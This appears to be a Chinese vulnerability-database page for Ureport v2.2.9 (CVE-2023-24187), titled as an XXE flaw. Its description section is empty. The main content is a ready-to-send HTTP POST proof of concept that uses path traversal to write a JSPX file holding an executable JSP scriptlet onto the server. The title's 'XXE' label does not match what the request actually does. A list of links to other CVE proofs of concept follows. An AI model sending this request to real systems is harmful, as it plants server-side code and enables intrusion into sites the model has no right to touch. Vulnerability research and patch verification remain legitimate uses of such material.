Ureport v2.2.9 CVE-2023-24187 XXE注入漏洞

漏洞描述

PoC代码

POST /adpweb/ureport/designer/saveReportFile HTTP/1.1
Host: 
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

file=file:///../../1.jspx&content=<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2"><jsp:directive.page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"/><jsp:scriptlet>out.print("11628tawgqh");</jsp:scriptlet></jsp:root>

相关漏洞推荐

• Fortinet FortiWeb /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi 权限绕过漏洞（CVE-2025-64446/CVE-2025-58034）
• Fortinet FortiWeb /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi 权限绕过漏洞（CVE-2025-64446）
• POC CVE-2025-44136: MapTiler Tileserver-php v2.0 - Unauthenticated XSS
• POC CVE-2025-44137: MapTiler Tileserver-php v2.0 - Unauthenticated File Read
• Hoverfly /api/v2/hoverfly/middleware 命令执行漏洞（CVE-2025-54123）
• wordpress /wp-json/wp/v2/users 信息泄露漏洞
• Windows NTLMv2-SSP Hash信息泄露漏洞(CVE-2025-50154)
• Jeecg-boot v2.1.2-v3.0.0 后台未授权SQL注入漏洞: Jeecg-boot v2.1.2-v3.0.0 后台未授权SQL注入漏洞
• JimuReport v1.7.8 /jeecg-boot/jmreport/dict/list 权限绕过漏洞（CVE-2024-44893）
• MapTiler Tileserver-php v2.0 存在xss漏洞(CVE-2025-44136)
• MapTiler Tileserver-php v2.0 存在目录遍历漏洞(CVE-2025-44137)
• POC CVE-2010-1586: HP System Management Homepage (SMH) v2.x.x.x - Open Redirect
• POC CVE-2015-2080: Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage